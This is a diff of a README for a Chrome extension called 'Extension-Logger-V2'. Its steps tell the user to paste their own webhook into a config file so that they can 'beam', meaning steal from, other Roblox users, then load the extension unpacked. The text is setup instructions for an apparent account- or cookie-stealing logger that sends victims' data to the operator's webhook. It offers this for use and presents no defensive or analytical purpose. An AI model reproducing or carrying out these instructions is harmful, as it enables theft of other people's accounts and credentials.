rovienson23/Extension-Logger-V2/README.md

 **INSTALLATION: Step 1: Download the files inorder to make the extension**

-**Step 2: Open the folder "extension" and then open the text file called "webhook"**
+**Step 2: Open the folder "extension" and then open the text file called "EGGS"**

-**Step 3: In order for you to beam other roblox users you must replace the "WEBHOOK HERE" then click file, then save**
+**Step 3: In order for you to beam other roblox users you must replace the "YOUR WEBHOOK" then click file, then save**

 **Step 4: Go to chrome://extensions/ and click load unpacked**